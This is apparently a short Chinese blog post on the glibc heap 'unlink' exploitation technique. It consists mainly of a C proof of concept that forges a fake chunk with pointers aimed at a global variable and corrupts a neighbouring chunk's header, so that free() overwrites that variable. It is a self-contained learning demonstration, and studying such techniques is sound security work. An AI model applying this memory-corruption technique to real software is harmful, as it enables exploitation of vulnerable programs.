pwn unlink 发表于 2019-10-18 | 字数统计: | 阅读时长 ≈ 一个实验的poc 12345678910111213141516171819202122232425262728#include<stdio.h>#include<stdlib.h>#include<unistd.h>unsigned long * target = 0;void init(){ setbuf(stdin,0); setbuf(stdout,0); setbuf(stderr,0);}int main(){ init(); unsigned long * ptr1 = malloc(0x88); unsigned long * ptr2 = malloc(0x88); unsigned long * ptr3 = malloc(0x18); target = ptr1; ptr1[0] = 0; ptr1[1] = 0x81; ptr1[2] = (unsigned long)(&target) - 0x18; ptr1[3] = (unsigned long)(&target) - 0x10; ptr2[-2] = 0x80; ptr2[-1] = 0x90; printf("target = %p before free\n",target); free(ptr2); printf("target = %p after free\n",target); printf("pid = %d\n",getpid()); getchar(); return 0;} 本文作者: zhz 本文链接: http://yoursite.com/2019/10/18/pwn unlink/ 版权声明: 本博客所有文章除特别声明外,均采用 CC BY-NC-SA 3.0 许可协议。转载请注明出处!